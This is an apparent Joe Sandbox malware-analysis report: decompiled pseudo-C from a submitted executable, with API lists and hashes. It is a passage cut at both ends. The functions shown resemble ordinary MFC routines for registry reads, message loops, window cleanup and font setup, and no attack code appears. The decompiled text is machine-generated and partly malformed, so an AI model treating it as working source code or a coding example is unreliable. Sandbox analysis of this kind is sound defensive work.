                                                      					L15:
                                                      					 *[fs:0x0] = _v12;
                                                      					_pop(_t98);
                                                      					_pop(_t101);
                                                      					_pop(_t80);
                                                      					_t47 = E0041E5DF(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
                                                      					__eflags =  &_a268;
                                                      					return _t47;
                                                      				} else {
                                                      					__eflags =  *(_t100 + 0x68);
                                                      					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
                                                      					if(__eflags != 0) {
                                                      						_push("Software\\");
                                                      						E00403667(_t79,  &_v16, 0, _t100, __eflags);
                                                      						_v4 = 0;
                                                      						E0040352C( &_v16,  *(_t100 + 0x54));
                                                      						_push(0x435478);
                                                      						_push( &_v16);
                                                      						_push( &_v36);
                                                      						_t54 = E0040541E(_t79, 0, _t100, __eflags);
                                                      						_push( *(_t100 + 0x68));
                                                      						_v4 = 1;
                                                      						_push(_t54);
                                                      						_push( &_v24);
                                                      						E0040541E(_t79, 0, _t100, __eflags);
                                                      						_v4 = 3;
                                                      						E00403036(_v36 + 0xfffffff0, _t95);
                                                      						_push( &_v24);
                                                      						_push(0x80000001);
                                                      						E00405482(_t79, 0, 0x80000001, __eflags);
                                                      						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
                                                      						__eflags = _t61;
                                                      						if(_t61 == 0) {
                                                      							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
                                                      							if(__eflags == 0) {
                                                      								_push( &_v16);
                                                      								_push(0x80000001);
                                                      								E00405482(_t79, 0, 0x80000001, __eflags);
                                                      							}
                                                      							RegCloseKey(_v20);
                                                      						}
                                                      						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
                                                      						E00403036( &(_v24[0xfffffffffffffff0]), _t95);
                                                      						__eflags =  &(_v16[0xfffffffffffffff0]);
                                                      						E00403036( &(_v16[0xfffffffffffffff0]), _t95);
                                                      						goto L15;
                                                      					} else {
                                                      						_push(_t104);
                                                      						_push(_t81);
                                                      						_t6 =  &_v280; // 0x4423e8
                                                      						_v280 = 0x442480;
                                                      						E0041F7F4(_t6, 0x43c590);
                                                      						asm("int3");
                                                      						_push(4);
                                                      						E0041F6EA(E00431BFC, _t79, 0, _t100);
                                                      						_t94 = E0040F014(0x104);
                                                      						_v292 = _t94;
                                                      						_t77 = 0;
                                                      						_v280 = 0;
                                                      						if(_t94 != 0) {
                                                      							_t77 = E0040D519(_t94);
                                                      						}
                                                      						return E0041F7C2(_t77);
                                                      					}
                                                      				}
                                                      			}

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 004055B0
                                                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0040566C
                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 00405683
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 0040569D
                                                      • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 004056AF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CloseEnumH_prolog3OpenQueryValue
                                                      • String ID: Software\
                                                      • API String ID: 3878845136-964853688
                                                      • Opcode ID: f023182a653509516668c61ee528ee225d48264462ccecaf34031b8ebcf169be
                                                      • Instruction ID: c7b39df0023e7795f59702957f2174eef86f6ceff4bf1e696be6c37735e09762
                                                      • Opcode Fuzzy Hash: f023182a653509516668c61ee528ee225d48264462ccecaf34031b8ebcf169be
                                                      • Instruction Fuzzy Hash: E141AB31900509ABCB21EBA5CC41AFFBBB9EF48314F10093BE551F22D1DB799A45CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E0040982D(intOrPtr* __ecx, signed int _a4) {
                                                      				struct HWND__* _v4;
                                                      				struct tagMSG* _v8;
                                                      				int _v12;
                                                      				int _v16;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				struct HWND__* _t42;
                                                      				struct tagMSG* _t43;
                                                      				signed int _t45;
                                                      				void* _t48;
                                                      				void* _t50;
                                                      				int _t53;
                                                      				long _t56;
                                                      				signed int _t62;
                                                      				intOrPtr* _t64;
                                                      				intOrPtr* _t67;
                                                      				void* _t68;
                                                      
                                                      				_t63 = __ecx;
                                                      				_t62 = 1;
                                                      				_t67 = __ecx;
                                                      				_v12 = 1;
                                                      				_v16 = 0;
                                                      				if((_a4 & 0x00000004) == 0 || (E0040C981(__ecx) & 0x10000000) != 0) {
                                                      					_t62 = 0;
                                                      				}
                                                      				_t42 = GetParent( *(_t67 + 0x20));
                                                      				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
                                                      				_v4 = _t42;
                                                      				_t43 = E00404C27(0);
                                                      				_t68 = UpdateWindow;
                                                      				_v8 = _t43;
                                                      				while(1) {
                                                      					L14:
                                                      					_t73 = _v12;
                                                      					if(_v12 == 0) {
                                                      						goto L15;
                                                      					}
                                                      					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
                                                      					if(__eflags != 0) {
                                                      						while(1) {
                                                      							L15:
                                                      							_t45 = E0040501F(_t63, 0, _t67, _t73);
                                                      							if(_t45 == 0) {
                                                      								break;
                                                      							}
                                                      							if(_t62 != 0) {
                                                      								_t53 = _v8->message;
                                                      								if(_t53 == 0x118 || _t53 == 0x104) {
                                                      									E0040CA4F(_t67, 1);
                                                      									UpdateWindow( *(_t67 + 0x20));
                                                      									_t62 = 0;
                                                      								}
                                                      							}
                                                      							_t64 = _t67;
                                                      							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
                                                      							_t79 = _t48;
                                                      							if(_t48 == 0) {
                                                      								_t39 = _t67 + 0x3c;
                                                      								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
                                                      								__eflags =  *_t39;
                                                      								return  *((intOrPtr*)(_t67 + 0x44));
                                                      							} else {
                                                      								_t50 = E00404F39(_t62, _t64, 0, _t67, _t68, _t79, _v8);
                                                      								_pop(_t63);
                                                      								if(_t50 != 0) {
                                                      									_v12 = 1;
                                                      									_v16 = 0;
                                                      								}
                                                      								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                      									continue;
                                                      								} else {
                                                      									goto L14;
                                                      								}
                                                      							}
                                                      						}
                                                      						_push(0);
                                                      						E00403CEC();
                                                      						return _t45 | 0xffffffff;
                                                      					}
                                                      					__eflags = _t62;
                                                      					if(_t62 != 0) {
                                                      						_t63 = _t67;
                                                      						E0040CA4F(_t67, 1);
                                                      						UpdateWindow( *(_t67 + 0x20));
                                                      						_t62 = 0;
                                                      						__eflags = 0;
                                                      					}
                                                      					__eflags = _a4 & 0x00000001;
                                                      					if((_a4 & 0x00000001) == 0) {
                                                      						__eflags = _v4;
                                                      						if(_v4 != 0) {
                                                      							__eflags = _v16;
                                                      							if(_v16 == 0) {
                                                      								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
                                                      							}
                                                      						}
                                                      					}
                                                      					__eflags = _a4 & 0x00000002;
                                                      					if(__eflags != 0) {
                                                      						L13:
                                                      						_v12 = 0;
                                                      						continue;
                                                      					} else {
                                                      						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
                                                      						_v16 = _v16 + 1;
                                                      						__eflags = _t56;
                                                      						if(__eflags != 0) {
                                                      							continue;
                                                      						}
                                                      						goto L13;
                                                      					}
                                                      				}
                                                      				goto L15;
                                                      			}
                                                      0x004098a0
                                                      0x004098a5
                                                      0x004098a7
                                                      0x004098ab
                                                      0x004098ad
                                                      0x004098b1
                                                      0x004098c0
                                                      0x004098c0
                                                      0x004098b1
                                                      0x004098ab
                                                      0x004098c6
                                                      0x004098cb
                                                      0x004098e8
                                                      0x004098e8
                                                      0x00000000
                                                      0x004098cd
                                                      0x004098da
                                                      0x004098e0
                                                      0x004098e4
                                                      0x004098e6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004098e6
                                                      0x004098cb
                                                      0x00000000

                                                      APIs
                                                      • GetParent.USER32(?), ref: 0040985B
                                                      • PeekMessageA.USER32 ref: 00409882
                                                      • UpdateWindow.USER32(?), ref: 0040989C
                                                      • SendMessageA.USER32(?,00000121,00000000,?), ref: 004098C0
                                                      • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 004098DA
                                                      • UpdateWindow.USER32(?), ref: 00409920
                                                      • PeekMessageA.USER32 ref: 00409954
                                                        • Part of subcall function 0040C981: GetWindowLongA.USER32 ref: 0040C98C
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Message$Window$PeekSendUpdate$LongParent
                                                      • String ID:
                                                      • API String ID: 2853195852-0
                                                      • Opcode ID: 5b0aaa6aca744f7147385050ea3bf78ee9ed67bc114c1dd5bc6550dd72ee26d1
                                                      • Instruction ID: 3594d42317ffdf77eda035bd5be05eb9f6962faab1b0a5bda36925cf630a621a
                                                      • Opcode Fuzzy Hash: 5b0aaa6aca744f7147385050ea3bf78ee9ed67bc114c1dd5bc6550dd72ee26d1
                                                      • Instruction Fuzzy Hash: 5B41BF712147419BDB21AF26CC84A2BBBE4FFC1B54F04493EF481A12E2D779DD04DA1A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E00404592(int __ebx, long __ecx, struct HWND__* __edi) {
                                                      				long _v4;
                                                      				char _v28;
                                                      				intOrPtr _v40;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				long _t20;
                                                      				long _t21;
                                                      				struct HWND__* _t22;
                                                      				long _t23;
                                                      				struct HWND__* _t24;
                                                      				long _t25;
                                                      				struct HWND__* _t26;
                                                      				void* _t33;
                                                      				void* _t35;
                                                      				long _t39;
                                                      				long _t41;
                                                      				intOrPtr _t43;
                                                      				struct HWND__* _t47;
                                                      				struct HWND__* _t49;
                                                      				long _t51;
                                                      				long _t53;
                                                      
                                                      				_t46 = __edi;
                                                      				_t39 = __ecx;
                                                      				_t37 = __ebx;
                                                      				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
                                                      					_t51 = E00403ED6();
                                                      					__eflags = _t51;
                                                      					if(_t51 != 0) {
                                                      						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
                                                      						__eflags = _t20;
                                                      						_t41 = _t51;
                                                      						_pop(_t52);
                                                      						if(_t20 != 0) {
                                                      							_t53 = _t41;
                                                      							_t21 =  *(_t53 + 0x64);
                                                      							__eflags = _t21;
                                                      							if(_t21 == 0) {
                                                      								_pop(_t52);
                                                      								goto L12;
                                                      							} else {
                                                      								__eflags = _t21 - 0x3f107;
                                                      								if(__eflags != 0) {
                                                      									_t35 = E0040DB94(__ebx, __edi, _t53, __eflags);
                                                      									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
                                                      								}
                                                      								return _t21;
                                                      							}
                                                      						} else {
                                                      							L12:
                                                      							_push(_t41);
                                                      							_push(_t37);
                                                      							_push(0);
                                                      							_push(_t52);
                                                      							_push(_t46);
                                                      							_v4 = _t41;
                                                      							_t22 = GetCapture();
                                                      							_t51 = SendMessageA;
                                                      							_t37 = 0x365;
                                                      							while(1) {
                                                      								_t47 = _t22;
                                                      								__eflags = _t47;
                                                      								if(_t47 == 0) {
                                                      									break;
                                                      								}
                                                      								_t23 = SendMessageA(_t47, _t37, 0, 0);
                                                      								__eflags = _t23;
                                                      								if(__eflags != 0) {
                                                      									L27:
                                                      									return _t23;
                                                      								} else {
                                                      									_t22 = E0040AF20(_t41, _t47, __eflags, _t47);
                                                      									continue;
                                                      								}
                                                      								goto L33;
                                                      							}
                                                      							_t24 = GetFocus();
                                                      							while(1) {
                                                      								_t46 = _t24;
                                                      								__eflags = _t46;
                                                      								if(_t46 == 0) {
                                                      									break;
                                                      								}
                                                      								_t23 = SendMessageA(_t46, _t37, 0, 0);
                                                      								__eflags = _t23;
                                                      								if(__eflags != 0) {
                                                      									goto L27;
                                                      								} else {
                                                      									_t24 = E0040AF20(_t41, _t46, __eflags, _t46);
                                                      									continue;
                                                      								}
                                                      								goto L33;
                                                      							}
                                                      							_t39 = _v4;
                                                      							_t25 = E0040AF65(_t37, _t39, _t46);
                                                      							__eflags = _t25;
                                                      							if(_t25 != 0) {
                                                      								_t26 = GetLastActivePopup( *(_t25 + 0x20));
                                                      								while(1) {
                                                      									_t49 = _t26;
                                                      									__eflags = _t49;
                                                      									_push(0);
                                                      									if(_t49 == 0) {
                                                      										break;
                                                      									}
                                                      									_t23 = SendMessageA(_t49, _t37, 0, ??);
                                                      									__eflags = _t23;
                                                      									if(__eflags == 0) {
                                                      										_t26 = E0040AF20(_t39, _t49, __eflags, _t49);
                                                      										continue;
                                                      									}
                                                      									goto L27;
                                                      								}
                                                      								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
                                                      								goto L27;
                                                      							} else {
                                                      								goto L1;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						L1:
                                                      						_push(0);
                                                      						_push(_t39);
                                                      						_t2 =  &_v28; // 0x4423e8
                                                      						_v28 = 0x442480;
                                                      						E0041F7F4(_t2, 0x43c590);
                                                      						asm("int3");
                                                      						_push(4);
                                                      						E0041F6EA(E00431BFC, _t37, _t46, _t51);
                                                      						_t43 = E0040F014(0x104);
                                                      						_v40 = _t43;
                                                      						_t33 = 0;
                                                      						_v28 = 0;
                                                      						if(_t43 != 0) {
                                                      							_t33 = E0040D519(_t43);
                                                      						}
                                                      						return E0041F7C2(_t33);
                                                      					}
                                                      				} else {
                                                      					__eflags = __eax - 0x3f107;
                                                      					if(__eax != 0x3f107) {
                                                      						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
                                                      					}
                                                      					return __eax;
                                                      				}
                                                      				L33:
                                                      			}


                                                      APIs
                                                      • GetCapture.USER32 ref: 0040F951
                                                      • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0040F96A
                                                      • GetFocus.USER32 ref: 0040F97C
                                                      • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0040F988
                                                      • GetLastActivePopup.USER32(?), ref: 0040F9AF
                                                      • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0040F9BA
                                                      • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 0040F9DE
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                      • String ID:
                                                      • API String ID: 3219385341-0
                                                      • Opcode ID: 2cde3028f60a794a7c700ba65a38728bb5095e0c535c8637e969885bad06cfd8
                                                      • Instruction ID: 6bbcefccedb64782f514be833ccaebf9a4cac9621966bdcb030a22abc8cdc0d5
                                                      • Opcode Fuzzy Hash: 2cde3028f60a794a7c700ba65a38728bb5095e0c535c8637e969885bad06cfd8
                                                      • Instruction Fuzzy Hash: 9C31D5B1700215BBDA316B25DC84F7B76ACAB85798B11003BF501F76D0CB3DEC0596AA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00409DC5(intOrPtr* __ecx) {
                                                      				struct HWND__* _v40;
                                                      				struct HWND__* _v44;
                                                      				intOrPtr _v48;
                                                      				void* _v52;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				long _t43;
                                                      				struct HWND__* _t48;
                                                      				long _t61;
                                                      				intOrPtr* _t63;
                                                      				signed int _t64;
                                                      				void* _t69;
                                                      				intOrPtr _t71;
                                                      				intOrPtr* _t72;
                                                      
                                                      				_t72 = __ecx;
                                                      				_t69 = E00404C1E();
                                                      				if(_t69 != 0) {
                                                      					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
                                                      						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                                                      					}
                                                      					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
                                                      						 *((intOrPtr*)(_t69 + 0x24)) = 0;
                                                      					}
                                                      				}
                                                      				_t63 =  *((intOrPtr*)(_t72 + 0x48));
                                                      				if(_t63 != 0) {
                                                      					 *((intOrPtr*)( *_t63 + 0x50))();
                                                      					 *((intOrPtr*)(_t72 + 0x48)) = 0;
                                                      				}
                                                      				_t64 =  *(_t72 + 0x4c);
                                                      				if(_t64 != 0) {
                                                      					 *((intOrPtr*)( *_t64 + 4))(1);
                                                      				}
                                                      				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
                                                      				_t83 =  *(_t72 + 0x3c) & 1;
                                                      				if(( *(_t72 + 0x3c) & 1) != 0) {
                                                      					_t71 =  *((intOrPtr*)(E0040DBC7(1, _t64, _t69, _t72, _t83) + 0x3c));
                                                      					if(_t71 != 0) {
                                                      						_t85 =  *(_t71 + 0x20);
                                                      						if( *(_t71 + 0x20) != 0) {
                                                      							E0041F330(_t71,  &_v52, 0, 0x30);
                                                      							_t48 =  *(_t72 + 0x20);
                                                      							_v44 = _t48;
                                                      							_v40 = _t48;
                                                      							_v52 = 0x28;
                                                      							_v48 = 1;
                                                      							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
                                                      						}
                                                      					}
                                                      				}
                                                      				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
                                                      				E00409BF3(_t61, _t72, GetWindowLongA, _t85);
                                                      				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
                                                      					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
                                                      					if(_t43 != 0) {
                                                      						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
                                                      					}
                                                      				}
                                                      				E00409D11(_t61, _t72);
                                                      				return  *((intOrPtr*)( *_t72 + 0x114))();
                                                      			}




















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend_memset
                                                      • String ID: (
                                                      • API String ID: 2997958587-3887548279
                                                      • Opcode ID: 4fc80bdcaf400218dc3c80102da1bb3e0474b3a793b6c10b4ee9a8a9b85137e4
                                                      • Instruction ID: 9e45313b090639f1ad71dca0b70a2556c303530e875c3b0a022525267220ac75
                                                      • Opcode Fuzzy Hash: 4fc80bdcaf400218dc3c80102da1bb3e0474b3a793b6c10b4ee9a8a9b85137e4
                                                      • Instruction Fuzzy Hash: 7E3190716003109FDB20EFA9C884A6FB7B5BF88315B15053EE545A76D2DB39EC40CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E00412822(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr _t49;
                                                      				signed int _t60;
                                                      				signed int _t64;
                                                      				signed int _t67;
                                                      				signed int _t80;
                                                      				signed int _t86;
                                                      				intOrPtr* _t90;
                                                      				void* _t91;
                                                      
                                                      				_t74 = __ebx;
                                                      				_push(0x80);
                                                      				E0041F753(E00432C16, __ebx, __edi, __esi);
                                                      				_t49 =  *((intOrPtr*)(_t91 + 8));
                                                      				_t90 = __ecx;
                                                      				 *((intOrPtr*)(_t91 - 0x50)) = 0;
                                                      				 *((intOrPtr*)(_t91 - 0x54)) = 0x4361e8;
                                                      				 *(_t91 - 4) = 0;
                                                      				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
                                                      					_t6 = _t91 - 0x54; // 0x4361e8
                                                      					if(E00411C82(_t6, 0x11) != 0) {
                                                      						L5:
                                                      						_t9 = _t91 - 0x54; // 0x4361e8
                                                      						_t49 = _t9;
                                                      						goto L6;
                                                      					} else {
                                                      						_t7 = _t91 - 0x54; // 0x4361e8
                                                      						if(E00411C82(_t7, 0xd) != 0) {
                                                      							goto L5;
                                                      						} else {
                                                      							 *((intOrPtr*)(_t90 + 0x64)) = 0;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					L6:
                                                      					GetObjectA( *(_t49 + 4), 0x3c, _t91 - 0x4c);
                                                      					_push(_t91 - 0x30);
                                                      					 *(_t91 - 0x78) = 0x20;
                                                      					E004036AB(_t74, _t91 - 0x58, 0, _t90, __eflags);
                                                      					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
                                                      					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
                                                      					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
                                                      					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
                                                      					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
                                                      					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
                                                      					_t60 =  *(_t91 - 0x4c);
                                                      					__eflags = _t60;
                                                      					 *(_t91 - 4) = 1;
                                                      					_t74 = _t60;
                                                      					if(__eflags < 0) {
                                                      						_t74 =  ~_t60;
                                                      					}
                                                      					E0040E75E(_t74, _t91 - 0x8c, 0, _t90, __eflags);
                                                      					 *(_t91 - 4) = 2;
                                                      					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
                                                      					_t64 = _t74 * 0xafc80;
                                                      					asm("cdq");
                                                      					_t86 = _t64 % _t80;
                                                      					_t90 = _t90 + 0x64;
                                                      					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
                                                      					 *(_t91 - 0x70) = _t64 / _t80;
                                                      					E0040ED13(_t90);
                                                      					_t67 = _t91 - 0x78;
                                                      					__imp__#420(_t67, 0x439480, _t90,  *((intOrPtr*)(_t90 + 0x20)));
                                                      					__eflags = _t67;
                                                      					if(__eflags < 0) {
                                                      						 *_t90 = 0;
                                                      					}
                                                      					 *(_t91 - 4) = 1;
                                                      					E0040E7B2(_t74, _t91 - 0x8c, 0, _t90, __eflags);
                                                      					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
                                                      					E00403036( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
                                                      				}
                                                      				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
                                                      				_t45 = _t91 - 0x54; // 0x4361e8
                                                      				 *((intOrPtr*)(_t91 - 0x54)) = 0x4361d8;
                                                      				E0040E956(_t45);
                                                      				return E0041F7D6(_t74, 0, _t90);
                                                      			}












                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 0041282C
                                                      • GetObjectA.GDI32(?,0000003C,?), ref: 0041287E
                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 004128EE
                                                      • OleCreateFontIndirect.OLEAUT32(00000020,00439480), ref: 0041291A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                      • String ID: $aC
                                                      • API String ID: 2429671754-2144110735
                                                      • Opcode ID: 3184c387fc046288f6b644fc771ddd44e823c9d317aa9a87c4637d74b33b126c
                                                      • Instruction ID: e04894aa077b9c1b9b57ffa01989e5e100f7f590183dedbf99927f803ccce2ea
                                                      • Opcode Fuzzy Hash: 3184c387fc046288f6b644fc771ddd44e823c9d317aa9a87c4637d74b33b126c
                                                      • Instruction Fuzzy Hash: 00418D74E012499EDB10DFE6C945ADCFBF4AF58304F10816BE455E72A2E7B88A84CB14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E00404ABD(void* __edx, signed int _a116, char _a120) {
                                                      				void _v12;
                                                      				char _v16;
                                                      				signed int _v20;
                                                      				int _v24;
                                                      				char _v124;
                                                      				char _v172;
                                                      				intOrPtr _v184;
                                                      				int __ebx;
                                                      				signed int __edi;
                                                      				signed int __esi;
                                                      				signed int __ebp;
                                                      				signed int _t26;
                                                      				unsigned int _t28;
                                                      				intOrPtr _t35;
                                                      				unsigned int _t39;
                                                      				intOrPtr _t40;
                                                      				void* _t42;
                                                      				void* _t43;
                                                      				signed int _t45;
                                                      
                                                      				_t45 =  &_v124;
                                                      				_t26 =  *0x443590; // 0xa920217c
                                                      				_a116 = _t26 ^ _t45;
                                                      				_push(_t43);
                                                      				_push(_t42);
                                                      				_t28 = GetMenuCheckMarkDimensions();
                                                      				_t38 = _t28;
                                                      				_t39 = _t28 >> 0x10;
                                                      				_v24 = _t39;
                                                      				if(_t28 <= 4 || __ecx <= 5) {
                                                      					_push(_t45);
                                                      					_push(_t39);
                                                      					_t4 =  &_v172; // 0x4423e8
                                                      					_v172 = 0x442480;
                                                      					E0041F7F4(_t4, 0x43c590);
                                                      					asm("int3");
                                                      					_push(4);
                                                      					E0041F6EA(E00431BFC, _t38, _t42, _t43);
                                                      					_t40 = E0040F014(0x104);
                                                      					_v184 = _t40;
                                                      					_t35 = 0;
                                                      					_v172 = 0;
                                                      					if(_t40 != 0) {
                                                      						_t35 = E0040D519(_t40);
                                                      					}
                                                      					return E0041F7C2(_t35);
                                                      				} else {
                                                      					if(__ebx > 0x20) {
                                                      						__ebx = 0x20;
                                                      					}
                                                      					__eax = __ebx - 4;
                                                      					asm("cdq");
                                                      					__eax = __ebx - 4 - __edx;
                                                      					__esi = __ebx + 0xf;
                                                      					__esi = __ebx + 0xf >> 4;
                                                      					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
                                                      					__esi = __esi << 4;
                                                      					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
                                                      					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
                                                      					if(__edi > 0xc) {
                                                      						__edi = 0xc;
                                                      					}
                                                      					__eax = 0x20;
                                                      					if(__ecx > __eax) {
                                                      						_v24 = __eax;
                                                      					}
                                                      					 &_v12 = E0041F330(__edi,  &_v12, 0xff, 0x80);
                                                      					_v24 = _v24 + 0xfffffffa;
                                                      					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
                                                      					__ecx = __esi + __esi;
                                                      					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
                                                      					__edx = 0x435374;
                                                      					_v20 = __esi + __esi;
                                                      					_v16 = 5;
                                                      					do {
                                                      						__si =  *__edx & 0x000000ff;
                                                      						__ecx = __edi;
                                                      						__si = ( *__edx & 0x000000ff) << __cl;
                                                      						__edx =  &(__edx[1]);
                                                      						__ecx = __si & 0x0000ffff;
                                                      						__eax->i = __ch;
                                                      						__eax->i = __cl;
                                                      						__eax = __eax + _v20;
                                                      						_t21 =  &_v16;
                                                      						 *_t21 = _v16 - 1;
                                                      					} while ( *_t21 != 0);
                                                      					__eax =  &_v12;
